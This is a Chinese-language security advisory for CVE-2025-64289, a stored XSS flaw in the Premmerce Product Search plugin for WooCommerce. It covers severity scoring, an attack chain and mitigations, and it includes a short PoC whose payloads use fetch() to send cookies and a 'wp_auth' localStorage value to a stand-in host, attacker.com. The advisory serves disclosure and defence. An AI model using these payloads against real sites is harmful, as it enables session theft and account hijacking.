CVE-2025-64289 Premmerce Product Search存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64289

漏洞类型

存储型XSS

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Premmerce Product Search for WooCommerce (premmerce-search)

漏洞概述

CVE-2025-64289是WordPress插件Premmerce Product Search for WooCommerce中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由于插件在处理用户输入时未对特殊字符进行充分的过滤和转义，导致攻击者可以在搜索功能中注入恶意JavaScript代码。这些恶意代码会被永久存储在数据库中，当其他用户访问包含恶意内容的页面时，攻击代码会自动执行。攻击者可以利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件。由于该插件用于增强WooCommerce产品搜索功能，受影响网站通常涉及电子商务场景，攻击成功后可能对交易安全和用户信任造成严重影响。漏洞评分5.9（CVSS:3.1），属于中危级别，需要高权限用户交互才能触发，但攻击成功后影响范围广泛。

技术细节

该存储型XSS漏洞存在于Premmerce Product Search for WooCommerce插件的搜索功能模块中。漏洞产生的根本原因是应用程序在将用户输入的数据回显到网页时，未能正确对HTML特殊字符（如<、>、"、'等）进行HTML实体编码。当攻击者在搜索框中输入包含JavaScript代码的字符串时，这些内容会被直接写入数据库并在后续页面加载时未经转义直接输出到HTML中。攻击者可通过构造恶意Payload（如<script>alert(document.cookie)</script>）注入代码。由于是存储型XSS，恶意代码会持久存在于系统中，所有访问受影响页面的用户都会受到攻击。攻击向量为网络（AV:N），需要高权限用户操作（PR:H）且需要用户交互（UI:R），但一旦代码被存储，攻击可自动传播。防御重点是在输出时对所有用户可控数据进行HTML编码，使用textContent而非innerHTML，设置严格的Content-Security-Policy头。

攻击链分析

STEP 1

步骤1

攻击者以高权限用户身份（如管理员）登录WordPress网站

STEP 2

步骤2

攻击者在Premmerce Product Search插件的搜索输入框中提交包含恶意JavaScript代码的Payload

STEP 3

步骤3

恶意代码被存储在数据库中，由于插件未对输入进行适当过滤和转义

STEP 4

步骤4

其他用户访问显示搜索结果的页面时，恶意代码被从数据库取出并未经转义直接输出到HTML

STEP 5

步骤5

受害者浏览器执行恶意JavaScript代码，导致Cookie/Session被窃取或执行其他恶意操作

STEP 6

步骤6

攻击者利用窃取的凭证劫持用户会话，进一步渗透或进行其他恶意活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64289 Stored XSS PoC
// Target: Premmerce Product Search for WooCommerce <= 2.2.5

// Step 1: Inject malicious JavaScript via search input
const maliciousPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';

// Step 2: Send the payload to the search endpoint
fetch(window.location.origin + '/?s=' + encodeURIComponent(maliciousPayload), {
    method: 'GET',
    credentials: 'include'
});

// Alternative Payload for event handlers (bypasses some filters):
const altPayload = '" onerror="fetch("https://attacker.com/log?data="+localStorage.getItem("wp_auth"))" x="';

// Step 3: Trigger the stored XSS by visiting a page where search results are displayed
// When admin or other users view the search results page, the script executes automatically

影响范围

Premmerce Product Search for WooCommerce <= 2.2.5

Premmerce Product Search for WooCommerce 从任意版本 through 2.2.5

防御指南

临时缓解措施

在无法立即升级插件的情况下，可采取以下临时缓解措施：1）使用Web应用防火墙（WAF）规则阻断包含<script>标签或事件处理器属性（如onerror、onload）的请求；2）临时禁用Premmerce Product Search插件，直到完成安全更新；3）在WordPress主题的functions.php中添加内容过滤器，对搜索相关输出进行强制HTML转义；4）加强对管理员账户的监控，及时发现异常操作；5）考虑使用第三方安全插件提供额外的XSS防护层。但这些措施仅为临时解决方案，无法替代及时升级插件。